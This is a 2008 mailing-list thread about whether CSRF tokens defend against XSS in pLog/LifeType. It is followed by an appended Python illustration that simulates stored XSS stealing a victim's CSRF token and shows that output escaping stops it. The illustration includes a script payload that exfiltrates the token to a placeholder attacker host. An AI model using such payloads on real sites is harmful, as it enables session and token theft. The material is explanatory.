[pLog-svn] xss in 1.2.7

Jon Daley plogworld at jon.limedaley.com
Mon May 5 23:54:10 EDT 2008


 	I must really not be getting XSS then.  If every post has to have 
a token on it, how would someone guess the token in order to have the 
javascript be accepted and displayed on the screen at all?  I'd expect the 
token to be checked first, and simply die() if it doesn't match.
 	I can't figure out a scenario where an attacker would be able to 
get javascript displayed on the screen to be executed within the context 
of that domain to steal a cookie, or do anything.

On Mon, 5 May 2008, Matt Wood wrote:

> a nonce/token isn't a defense against XSS... it isn't even a very good
> defense against CSRF, but the best we really know about ATM.
>
> On Mon, May 5, 2008 at 5:41 PM, Jon Daley <plogworld at jon.limedaley.com>
> wrote:
>
>> On Mon, 5 May 2008, Reto Hugi wrote:
>>
>>> But in most cases CSRF countermeasures become useless if you have XSS
>>> vulnerabilities (remember: XSS means code injection in your html, means
>>> possibility to grab nonces etc...)
>>>
>>        Right, but if you don't even accept the POST in the first place,
>> then it doesn't matter what the content is, no matter where it came from,
>> right?
>>
>> _______________________________________________
>> pLog-svn mailing list
>> pLog-svn at devel.lifetype.net
>> http://limedaley.com/mailman/listinfo/plog-svn
>>
>

-- 
Jon Daley
http://jon.limedaley.com/

An essential aspect of creativity is not being afraid to fail.
-- Dr. Edwin Land
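The point Matt and Reto are making, as an added illustration that is not part of the thread and not pLog/LifeType code: a CSRF token only decides whether a POST is accepted; it says nothing about what happens to the content once it is stored and rendered. The attacker in a stored-XSS case is simply a logged-in user who received a valid token the normal way, so the token check passes and die() is never reached. All names below (BlogHandler, the attacker.example URL, the regex that stands in for the victim's browser) are hypothetical stand-ins constructed for this example.

```python
import html
import re
import secrets

# Constructed payload: a comment body carrying a script that, if it runs in the
# victim's browser, reads the hidden CSRF field and sends it to a placeholder host.
PAYLOAD = ('<script>new Image().src="http://attacker.example/?t="'
           '+document.forms[0].token.value</script>')

SCRIPT_RE = re.compile(r"<script>(.*?)</script>", re.S)
TOKEN_RE = re.compile(r'name="token" value="([0-9a-f]+)"')


class BlogHandler:
    """Toy comment handler: per-session CSRF token, checked before anything else."""

    def __init__(self, escape_output):
        self.escape_output = escape_output  # False = vulnerable, True = hardened
        self.comments = []
        self.tokens = {}  # session id -> CSRF token

    def new_session(self):
        sid = secrets.token_hex(8)
        self.tokens[sid] = secrets.token_hex(16)
        return sid

    def post_comment(self, sid, token, text):
        expected = self.tokens.get(sid, "")
        if not secrets.compare_digest(expected, token):
            return False  # the die() branch: token mismatch, body never looked at
        self.comments.append(text)  # token matched, so the body is stored as-is
        return True

    def render(self, sid):
        form = ('<form method="POST"><input type="hidden" name="token" '
                f'value="{self.tokens[sid]}"></form>')
        items = [html.escape(c, quote=True) if self.escape_output else c
                 for c in self.comments]
        return form + "\n" + "\n".join(f"<p>{c}</p>" for c in items)


def browser_runs(page):
    """Stand-in for the victim's browser: an unescaped <script> element runs in
    the page's origin and can read the hidden token. Returns the token such a
    script could exfiltrate, or None when no script element is present."""
    if SCRIPT_RE.search(page) is None:
        return None
    m = TOKEN_RE.search(page)
    return m.group(1) if m else None


def demo(escape_output):
    """Returns (attacker's post accepted, script runs for victim, forged post as victim accepted)."""
    app = BlogHandler(escape_output)

    # The attacker is an ordinary logged-in user and gets a token the legitimate way.
    attacker = app.new_session()
    attacker_token = TOKEN_RE.search(app.render(attacker)).group(1)
    accepted = app.post_comment(attacker, attacker_token, PAYLOAD)

    # A victim later views the page; the stored comment is rendered into their DOM.
    victim = app.new_session()
    leaked = browser_runs(app.render(victim))

    # With the victim's token in hand, the CSRF check no longer protects the victim.
    forged = leaked is not None and app.post_comment(victim, leaked, "posted as the victim")
    return accepted, leaked is not None, forged


if __name__ == "__main__":
    print("unescaped output:", demo(escape_output=False))
    print("escaped output:  ", demo(escape_output=True))
```

In both runs the attacker's POST is accepted, because the token check is doing exactly what it should. Only output escaping decides whether the victim's browser executes the comment; and once it does, the script reads the victim's own token from the form, which is how XSS turns a nonce-protected action into a forgeable one.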

